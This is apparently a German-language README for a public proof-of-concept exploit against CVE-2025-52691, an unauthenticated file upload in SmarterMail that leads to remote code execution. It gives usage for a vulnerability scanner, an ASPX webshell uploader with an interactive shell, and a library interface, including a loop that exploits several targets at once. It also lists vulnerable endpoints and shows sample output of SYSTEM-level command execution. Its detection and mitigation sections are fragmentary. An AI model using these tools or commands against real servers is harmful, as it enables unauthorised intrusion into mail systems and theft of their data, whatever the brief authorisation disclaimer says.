
Proof-of-Concept-Exploit für CVE-2025-52691: Unauthentifizierter beliebiger Dateiupload, der zu Remote-Codeausführung (RCE) in SmarterMail führt. Enthält einen Schwachstellenscanner, einen ASPX-Webshell-Uploader und eine interaktive Shell für autorisierte Sicherheitstests.
Proof-of-Concept für CVE-2025-52691 – SmarterMail Unauthenticated Arbitrary File Upload RCE
Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Unbefugter Zugriff ist illegal.
Kritische Schwachstelle in SmarterMail, die nicht authentifizierten Benutzern das Hochladen beliebiger Dateien durch Path Traversal ermöglicht, was zu Remote-Codeausführung führt.
Schwachstelle: Path Traversal in Upload-Endpunkten ermöglicht das Hochladen von ASPX-Webshells in das Webroot
Auswirkung: Nicht authentifizierte Remote-Codeausführung
Angriffsvektor: Netzwerk / Nicht authentifiziert
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3
Scannt Ziele auf die Schwachstelle CVE-2025-52691. Speichert nur verwundbare URLs in der Ausgabedatei.
# Single target
python check.py https://mail.example.com
# Multiple targets
python check.py -f targets.txt -o results.txt
# Custom timeout
python check.py https://mail.example.com -t 30
Ausgabe: Eine verwundbare URL pro Zeile in results.txt
Lädt eine ASPX-Webshell hoch und ermöglicht die Ausführung von Befehlen.
# Basic exploit
python pwn.py https://mail.example.com
# Execute command
python pwn.py https://mail.example.com -c "whoami"
# Interactive shell
python pwn.py https://mail.example.com -i
Wiederverwendbares Exploit-Modul zur Integration in eigene Skripte.
Als Bibliothek:
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)
if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
print(exploit.execute_command("whoami"))
# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()
# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
print(exploit.execute_command("whoami"))
print(exploit.execute_command("hostname"))
print(exploit.execute_command("ipconfig"))
Als eigenständiges Skript:
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"
# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
config = TargetConfig(base_url=target)
exploit = SmarterMailExploit(config)
if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
print(f"[+] Exploited: {target}")
print(exploit.execute_command("whoami"))
EOF
python my_exploit.py
Verwundbare Endpunkte:
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx
Exploitation-Methoden:
../wwwroot/)Webshell: Minimale ASPX-Shell, die Befehle über den Parameter ?cmd= entgegennimmt
python check.py <target>python pwn.py <target> -iErkennung:
../) prüfen/api/upload-AnfragenGegenmaßnahmen:
$ python pwn.py https://mail.example.com -c "whoami"
[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx
[*] Executing: whoami
[+] Output:
nt authority\system
Holen Sie vor dem Testen stets die entsprechende Genehmigung ein.